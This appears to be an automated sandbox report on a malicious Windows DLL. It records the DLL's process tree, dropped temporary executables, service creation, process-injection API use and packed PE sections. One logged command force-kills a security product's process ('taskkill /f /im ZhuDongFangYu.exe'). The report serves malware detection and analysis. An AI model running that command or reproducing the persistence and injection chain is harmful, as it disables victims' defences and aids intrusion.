Source: Microsoft-Windows-SmbClient%4Connectivity.evtx.25.dr	Binary string: :\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-SMBServer%4Operational.evtx.25.dr	Binary string: WIN-77KHDDR6TT1 WORKGROUP:\Device\NetBT_Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.25.dr	Binary string: 1\Device\HarddiskVolume3\Windows\System32\curl.exe?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe
Source: Microsoft-Windows-UAC-FileVirtualization%4Operational.evtx.25.dr	Binary string: 9\Device\HarddiskVolume3\Windows\SysWOW64\msvcp110_win.dll?\Device\HarddiskVolume3\Program Files (x86)\AutoIt3\AutoIt3.exe

Source: classification engine

Classification label: mal100.troj.evad.winDLL@25/72@0/0

Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp

Code function: LoadLibraryA,GetProcAddress,GetSystemDirectoryA,strncmp,wsprintfA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,lstrcpyA,lstrcatA,OpenSCManagerA,CreateServiceA,GetLastError,StartServiceA,StartServiceA,lstrcpyA,lstrcatA,lstrlenA,

30_2_00402B40

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Code function: 6_2_004765B3 CloseHandle,GetModuleHandleA,NtCreateFile,NtOpenFile,NtCreateProcess,NtCreateProcessEx,NtCreateUserProcess,NtQueryInformationProcess,lstrcpyW,lstrcpyW,lstrcatW,NtMapViewOfSection,NtOpenProcessToken,CreateToolhelp32Snapshot,Process32First,Process32Next,OpenProcess,CreateRemoteThread,CloseHandle,CloseHandle,

6_2_004765B3

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001193 FindResourceW,SizeofResource,LoadResource,LockResource,GetTempPathW,GetTempFileNameW,CreateFileW,WriteFile,CloseHandle,CloseHandle,RtlZeroMemory,CreateProcessW,CloseHandle,CloseHandle,

0_2_10001193

Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp

Code function: 30_2_00402B40 LoadLibraryA,GetProcAddress,GetSystemDirectoryA,strncmp,wsprintfA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,lstrcpyA,lstrcatA,OpenSCManagerA,CreateServiceA,GetLastError,StartServiceA,StartServiceA,lstrcpyA,lstrcatA,lstrlenA,

30_2_00402B40

Source: C:\Windows\System32\lsass.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Protect\S-1-5-21-2246122658-3693405117-2476756634-1003\1306eb95-1ab6-43bf-b773-ac80ff75f2fc

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6472:120:WilError_03
Source: C:\Windows\SysWOW64\rundll32.exe	Mutant created: \Sessions\1\BaseNamedObjects\100200

Source: C:\Windows\System32\loaddll32.exe

File created: C:\Users\user\AppData\Local\Temp\hrlBAE7.tmp

Jump to behavior

Source: 26B1sczZ88.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\taskkill.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkDllInitialize

Source: 26B1sczZ88.dll

ReversingLabs: Detection: 97%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkDllInitialize
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll",#1
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp C:\Users\user\AppData\Local\Temp\hrl97BF.tmp
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp C:\Users\user\AppData\Local\Temp\hrl97AF.tmp
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkDrawTextEx
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Users\user\AppData\Local\Temp\hrlA367.tmp C:\Users\user\AppData\Local\Temp\hrlA367.tmp
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkEditControl
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im ZhuDongFangYu.exe /t
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\zvhcfa.exe C:\Windows\SysWOW64\zvhcfa.exe
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkDllInitialize	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkDrawTextEx	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\26B1sczZ88.dll,LpkEditControl	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\26B1sczZ88.dll",#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Users\user\AppData\Local\Temp\hrlA367.tmp C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im ZhuDongFangYu.exe /t	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: lpk.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: ngcpopkeysrv.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: pcpksp.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\lsass.exe	Section loaded: tbs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: mfc42.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\zvhcfa.exe	Section loaded: mfc42.dll

Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbll source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\wctD1EA.tmp.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb* source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb837 source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wct495D.tmp.pdb\* source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: .@C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.errorl source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb949 source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A583178b @ source: svchost.exe, 00000018.00000000.1526971073.000002258EC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2757685837.000002258EC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\wct102E.tmp.pdb source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000018.00000000.1526926841.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.2756312554.000002258EC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000018.00000002.2758587508.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000018.00000000.1527020756.000002258EC5C000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp

Code function: 6_2_00402430 FindResourceA,LoadLibraryA,GetProcAddress,LoadResource,LockResource,CreateFileA,WriteFile,CloseHandle,

6_2_00402430

Source: initial sample

Static PE information: section where entry point is pointing to: uuxeujz

Source: hrlBAE7.tmp.0.dr	Static PE information: section name: rhxpypg
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: xcmhltj
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: hnrxhix
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: woslvkg
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: eszpqhx
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: orzkedv
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: zwezcbc
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: uuxeujz
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: xgmlxsd
Source: hrl97BF.tmp.3.dr	Static PE information: section name: rhxpypg
Source: hrl97BF.tmp.3.dr	Static PE information: section name: xcmhltj
Source: hrl97BF.tmp.3.dr	Static PE information: section name: hnrxhix
Source: hrl97BF.tmp.3.dr	Static PE information: section name: woslvkg
Source: hrl97BF.tmp.3.dr	Static PE information: section name: eszpqhx
Source: hrl97BF.tmp.3.dr	Static PE information: section name: orzkedv
Source: hrl97BF.tmp.3.dr	Static PE information: section name: zwezcbc
Source: hrl97BF.tmp.3.dr	Static PE information: section name: uuxeujz
Source: hrl97BF.tmp.3.dr	Static PE information: section name: xgmlxsd
Source: hrl97AF.tmp.4.dr	Static PE information: section name: rhxpypg
Source: hrl97AF.tmp.4.dr	Static PE information: section name: xcmhltj
Source: hrl97AF.tmp.4.dr	Static PE information: section name: hnrxhix
Source: hrl97AF.tmp.4.dr	Static PE information: section name: woslvkg
Source: hrl97AF.tmp.4.dr	Static PE information: section name: eszpqhx
Source: hrl97AF.tmp.4.dr	Static PE information: section name: orzkedv
Source: hrl97AF.tmp.4.dr	Static PE information: section name: zwezcbc
Source: hrl97AF.tmp.4.dr	Static PE information: section name: uuxeujz
Source: hrl97AF.tmp.4.dr	Static PE information: section name: xgmlxsd
Source: hrlA367.tmp.20.dr	Static PE information: section name: rhxpypg
Source: hrlA367.tmp.20.dr	Static PE information: section name: xcmhltj
Source: hrlA367.tmp.20.dr	Static PE information: section name: hnrxhix
Source: hrlA367.tmp.20.dr	Static PE information: section name: woslvkg
Source: hrlA367.tmp.20.dr	Static PE information: section name: eszpqhx
Source: hrlA367.tmp.20.dr	Static PE information: section name: orzkedv
Source: hrlA367.tmp.20.dr	Static PE information: section name: zwezcbc
Source: hrlA367.tmp.20.dr	Static PE information: section name: uuxeujz
Source: hrlA367.tmp.20.dr	Static PE information: section name: xgmlxsd
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: rhxpypg
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: xcmhltj
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: hnrxhix
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: woslvkg
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: eszpqhx
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: orzkedv
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: zwezcbc
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: uuxeujz
Source: hrlAF3E.tmp.28.dr	Static PE information: section name: xgmlxsd
Source: zvhcfa.exe.30.dr	Static PE information: section name: rhxpypg
Source: zvhcfa.exe.30.dr	Static PE information: section name: xcmhltj
Source: zvhcfa.exe.30.dr	Static PE information: section name: hnrxhix
Source: zvhcfa.exe.30.dr	Static PE information: section name: woslvkg
Source: zvhcfa.exe.30.dr	Static PE information: section name: eszpqhx
Source: zvhcfa.exe.30.dr	Static PE information: section name: orzkedv
Source: zvhcfa.exe.30.dr	Static PE information: section name: zwezcbc
Source: zvhcfa.exe.30.dr	Static PE information: section name: uuxeujz
Source: zvhcfa.exe.30.dr	Static PE information: section name: xgmlxsd

Source: C:\Users\user\AppData\Local\Temp\hrl97BF.tmp	Code function: 6_2_00405B70 push eax; ret	6_2_00405B9E
Source: C:\Users\user\AppData\Local\Temp\hrl97AF.tmp	Code function: 7_2_00405B70 push eax; ret	7_2_00405B9E
Source: C:\Users\user\AppData\Local\Temp\hrlA367.tmp	Code function: 21_2_00405B70 push eax; ret	21_2_00405B9E
Source: C:\Users\user\AppData\Local\Temp\hrlAF3E.tmp	Code function: 30_2_00405B70 push eax; ret	30_2_00405B9E

Source: hrlBAE7.tmp.0.dr	Static PE information: section name: .rsrc entropy: 7.492461511063864
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: rhxpypg entropy: 7.63278169353373
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: xcmhltj entropy: 7.631443406476418
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: hnrxhix entropy: 7.6346675642622985
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: woslvkg entropy: 7.637402478191515
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: eszpqhx entropy: 7.635747701568092
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: orzkedv entropy: 7.636407908522585
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: zwezcbc entropy: 7.625644621095766
Source: hrlBAE7.tmp.0.dr	Static PE information: section name: uuxeujz entropy: 7.629124904063967
Source: hrl97BF.tmp.3.dr	Static PE information: section name: .rsrc entropy: 7.492461511063864
Source: hrl97BF.tmp.3.dr	Static PE information: section name: rhxpypg entropy: 7.63278169353373
Source: hrl97BF.tmp.3.dr	Static PE information: section name: xcmhltj entropy: 7.631443406476418
Source: hrl97BF.tmp.3.dr	Static PE information: section name: hnrxhix entropy: 7.6346675642622985
Source: hrl97BF.tmp.3.dr	Static PE information: section name: woslvkg entropy: 7.637402478191515
Source: hrl97BF.tmp.3.dr	Static PE information: section name: eszpqhx entropy: 7.635747701568092
Source: hrl97BF.tmp.3.dr	Static PE information: section name: orzkedv entropy: 7.636407908522585
Source: hrl97BF.tmp.3.dr	Static PE information: section name: zwezcbc entropy: 7.625644621095766
Source: hrl97BF.tmp.3.dr	Static PE information: section name: uuxeujz entropy: 7.629124904063967
Source: hrl97AF.tmp.4.dr	Static PE information: section name: .rsrc entropy: 7.492461511063864
Source: hrl97AF.tmp.4.dr	Static PE information: section name: rhxpypg entropy: 7.63278169353373
Source: hrl97AF.tmp.4.dr	Static PE information: section name: xcmhltj entropy: 7.631443406476418
Source: hrl97AF.tmp.4.dr	Static PE information: section name: hnrxhix entropy: 7.6346675642622985
Source: hrl97AF.tmp.4.dr	Static PE information: section name: woslvkg entropy: 7.637402478191515
Source: hrl97AF.tmp.4.dr	Static PE information: section name: eszpqhx entropy: 7.635747701568092
Source: hrl97AF.tmp.4.dr	Static PE information: section name: orzkedv entropy: 7.636407908522585
Source: hrl97AF.tmp.4.dr	Static PE information: section name: zwezcbc entropy: 7.625644621095766
Source: hrl97AF.tmp.4.dr	Static PE information: section name: uuxeujz entropy: 7.629124904063967
Source: hrlA367.tmp.20.dr	Static PE information: section name: .rsrc entropy: 7.492461511063864
Source: hrlA367.tmp.20.dr	Static PE information: section name: rhxpypg entropy: 7.63278169353373
Source: hrlA367.tmp.20.dr	Static PE information: section name: xcmhltj entropy: 7.631443406476418
Source: hrlA367.tmp.20.dr	Static PE information: section name: hnrxhix entropy: 7.6346675642622985
Source: hrlA367.tmp.20.dr	Static PE information: section name: woslvkg entropy: 7.637402478191515
Source: hrlA367.tmp.20.dr	Static PE information: section name: eszpqhx entropy: 7.635747701568092
Source: hrlA367.tmp.20.dr	Static PE information: section name: orzkedv entropy: 7.636407908522585
Source: hrlA367.tmp.20.dr	Static PE information: section name: zwezcbc entropy: 7.625644621095766
